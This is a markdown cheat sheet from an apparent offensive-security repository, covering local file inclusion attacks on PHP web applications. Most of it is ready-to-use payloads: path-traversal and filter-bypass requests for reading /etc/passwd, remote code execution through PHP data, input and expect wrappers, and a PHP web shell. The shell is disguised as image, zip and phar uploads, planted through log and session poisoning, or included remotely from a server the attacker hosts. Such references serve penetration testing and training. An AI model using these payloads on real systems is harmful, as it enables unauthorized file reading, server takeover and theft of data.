daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

lfi.md (5101B)


      1 ---
      2 title: "LFI"
      3 description: "LFI — operator reference."
      4 category: enumeration
      5 tags: ["enumeration", "adcs", "file-inclusion"]
      6 tools: ["ffuf"]
      7 difficulty: intermediate
      8 updated: "2026-08-10"
      9 source: "vault:Enumeration/LFI - Cheat Sheet.md"
     10 ---
     11 ## Local File Inclusion
     12 
     13 |**Command**|**Description**|
     14 |---|---|
     15 |**Basic LFI**||
     16 |`/index.php?language=/etc/passwd`|Basic LFI|
     17 |`/index.php?language=../../../../etc/passwd`|LFI with path traversal|
     18 |`/index.php?language=/../../../etc/passwd`|LFI with name prefix|
     19 |`/index.php?language=./languages/../../../../etc/passwd`|LFI with approved path|
     20 |**LFI Bypasses**||
     21 |`/index.php?language=....//....//....//....//etc/passwd`|Bypass basic path traversal filter|
     22 |`/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64`|Bypass filters with URL encoding|
     23 |`/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]`|Bypass appended extension with path truncation (obsolete)|
     24 |`/index.php?language=../../../../etc/passwd%00`|Bypass appended extension with null byte (obsolete)|
     25 |`/index.php?language=php://filter/read=convert.base64-encode/resource=config`|Read PHP with base64 filter|
     26 
     27 ## Remote Code Execution
     28 
     29 |**Command**|**Description**|
     30 |---|---|
     31 |**PHP Wrappers**||
     32 |`/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id`|RCE with data wrapper|
     33 |`curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"`|RCE with input wrapper|
     34 |`curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"`|RCE with expect wrapper|
     35 |**RFI**||
     36 |`echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>`|Host web shell|
     37 |`/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id`|Include remote PHP web shell|
     38 |**LFI + Upload**||
     39 |`echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif`|Create malicious image|
     40 |`/index.php?language=./profile_images/shell.gif&cmd=id`|RCE with malicious uploaded image|
     41 |`echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php`|Create malicious zip archive 'as jpg'|
     42 |`/index.php?language=zip://shell.zip%23shell.php&cmd=id`|RCE with malicious uploaded zip|
     43 |`php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg`|Create malicious phar 'as jpg'|
     44 |`/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id`|RCE with malicious uploaded phar|
     45 |**Log Poisoning**||
     46 |`/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd`|Read PHP session parameters|
     47 |`/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E`|Poison PHP session with web shell|
     48 |`/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id`|RCE through poisoned PHP session|
     49 |`curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'`|Poison server log|
     50 |`/index.php?language=/var/log/apache2/access.log&cmd=id`|RCE through poisoned PHP session|
     51 
     52 ## Misc
     53 
     54 |**Command**|**Description**|
     55 |---|---|
     56 |`ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287`|Fuzz page parameters|
     57 |`ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287`|Fuzz LFI payloads|
     58 |`ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287`|Fuzz webroot path|
     59 |`ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287`|Fuzz server configurations|
     60 |[LFI Wordlists](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)||
     61 |[LFI-Jhaddix.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt)||
     62 |[Webroot path wordlist for Linux](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt)||
     63 |[Webroot path wordlist for Windows](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt)||
     64 |[Server configurations wordlist for Linux](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux)||
     65 |[Server configurations wordlist for Windows](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows)||
     66 
     67 ## File Inclusion Functions
     68 
     69 |**Function**|**Read Content**|**Execute**|**Remote URL**|
     70 |---|:-:|:-:|:-:|
     71 |**PHP**||||
     72 |`include()`/`include_once()`|Yes|Yes|Yes|
     73 |`require()`/`require_once()`|Yes|Yes|No|
     74 |`file_get_contents()`|Yes|No|Yes|
     75 |`fopen()`/`file()`|Yes|No|No|
     76 |**NodeJS**||||
     77 |`fs.readFile()`|Yes|No|No|
     78 |`fs.sendFile()`|Yes|No|No|
     79 |`res.render()`|Yes|Yes|No|
     80 |**Java**||||
     81 |`include`|Yes|No|No|
     82 |`import`|Yes|Yes|Yes|
     83 |**.NET**||||
     84 |`@Html.Partial()`|Yes|No|No|
     85 |`@Html.RemotePartial()`|Yes|No|Yes|
     86 |`Response.WriteFile()`|Yes|No|No|
     87 |`include`|Yes|Yes|Yes|